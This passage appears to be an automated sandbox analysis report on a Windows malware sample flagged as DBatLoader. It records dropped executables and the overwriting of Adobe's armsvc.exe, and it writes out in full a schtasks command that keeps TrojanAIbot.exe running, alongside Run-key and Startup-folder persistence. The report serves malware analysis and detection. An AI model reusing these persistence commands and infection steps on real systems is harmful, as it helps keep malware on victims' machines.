                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.10.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: x.exeStatic file information: File size 1081856 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2187757870.0000000028410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021E90000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021EBF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.x.exe.2ec0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02ED894C
                      Source: Wisrysxl.PIF.6.drStatic PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: x.exeStatic PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: neworigin.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: armsvc.exe.8.drStatic PE information: real checksum: 0x32318 should be: 0x149d34
                      Source: lxsyrsiW.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: TrojanAIbot.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: server_BTC.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.5.drStatic PE information: section name: .didat
                      Source: armsvc.exe.8.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EED2FC push 02EED367h; ret 0_2_02EED35F
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC63AE push 02EC640Bh; ret 0_2_02EC6403
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC63B0 push 02EC640Bh; ret 0_2_02EC6403
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EEC378 push 02EEC56Eh; ret 0_2_02EEC566
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECC349 push 8B02ECC1h; ret 0_2_02ECC34E
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC332C push eax; ret 0_2_02EC3368
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EED0AC push 02EED125h; ret 0_2_02EED11D
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EEE0A9 push edx; retf 0_2_02EEE0AA
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED306C push 02ED30B9h; ret 0_2_02ED30B1
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED306B push 02ED30B9h; ret 0_2_02ED30B1
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EED1F8 push 02EED288h; ret 0_2_02EED280
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EED144 push 02EED1ECh; ret 0_2_02EED1E4
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDF108 push ecx; mov dword ptr [esp], edx0_2_02EDF10D
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC6784 push 02EC67C6h; ret 0_2_02EC67BE
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC6782 push 02EC67C6h; ret 0_2_02EC67BE
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECD5A0 push 02ECD5CCh; ret 0_2_02ECD5C4
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECC56C push ecx; mov dword ptr [esp], edx0_2_02ECC571
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EEC570 push 02EEC56Eh; ret 0_2_02EEC566
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDAAE0 push 02EDAB18h; ret 0_2_02EDAB10
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED8AD8 push 02ED8B10h; ret 0_2_02ED8B08
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECCA4F push 02ECCD72h; ret 0_2_02ECCD6A
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECCBEC push 02ECCD72h; ret 0_2_02ECCD6A
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED886C push 02ED88AEh; ret 0_2_02ED88A6
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02F34850 push eax; ret 0_2_02F34920
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED6948 push 02ED69F3h; ret 0_2_02ED69EB
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED6946 push 02ED69F3h; ret 0_2_02ED69EB
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED790C push 02ED7989h; ret 0_2_02ED7981
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED5E7C push ecx; mov dword ptr [esp], edx0_2_02ED5E7E
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED2F60 push 02ED2FD6h; ret 0_2_02ED2FCE
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1000B180 push 1000B0CAh; ret 8_1_1000B061
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1000B180 push 1000B30Dh; ret 8_1_1000B1E6

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Drops executable to a common third party application directory
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_1_1002CBD0
                      Source: C:\Users\user\Desktop\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\Desktop\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02EDAB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
